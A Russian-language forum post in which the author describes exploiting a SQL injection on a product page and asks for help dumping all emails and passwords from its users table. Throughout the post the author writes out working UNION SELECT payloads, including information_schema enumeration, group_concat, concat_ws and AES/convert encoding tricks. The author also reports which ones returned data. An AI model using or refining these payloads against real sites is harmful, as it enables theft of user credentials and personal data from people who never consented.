Привет всем. Помогите понять плз
Есть скуля
Сообщение от
None
http://site.net/products/serial.php?serial_id=-1168+union+select+1,2,3,4,username,6,7,8,9+from+us ers--+
в таблице юзеров нужные колонки
username
password
email
Если выводить username без лимита, то на страницу выводятся все 20к юзернэймов (все что есть в бд)
Но если пытаться вывести так же
password или
email-то в ответ пустая страница. concat(*) таже фигня, как поотдельности так и вместе обьединял, ничего. username отдельно выводится как угодно,все из базы. Но вместе никак.
И по отдельности
password или
email тоже не выводятся. Только через лимит или group_concat(*)
Думал мож дело в кодировке, пробовал так
Сообщение от
None
AES_DECRYPT(AES_ENCRYPT(concat(username),0x71),0x7 1),6,7,8,9+from+users--+
выводятся.
Сообщение от
None
AES_DECRYPT(AES_ENCRYPT(concat(email *или пасс, с конкатом и без*),0x71),0x71),6,7,8,9+from+users--+
невыводятся
Сообщение от
None
convert(email,binary),6,7,8,9+from+users--+
тоже некатит
Сообщение от
None
convert(email+using+latin1),6,7,8,9+from+users--+
некатит
Сообщение от
None
concat_ws(0x3A3a,table_schema,table_name,column_na me),6,7,8,9+from+information_schema.columns--+
Выводит все таблицы и колонки на страницу, как и юзернэйм. А мыло с пассом нет =(
Сообщение от
None
group_concat(email,0x3a,password),6,7,8,9+from+use rs--+
выводит и мыло и пасс и поотдельности тоже выводит.
И через limit они выводятся.
Но сами по себе нет.
password,6,7,8,9+from+users--+
Через like выводятся
concat_ws(0x3a,email,password),6,7,8,9+from+users+ where+email+like+'a%'--+
но не хочу весь алфавит перебирать =)
Можно ли как то вывести ВСЕ мыла и пассы. Возможно по какому то общему критерию, который есть в каждой записи...хз. Может скажем в условии можно сделать вывод всех мыл и пассов, у которых колонка id не пустая.
Очень буду благодарен если обьясните.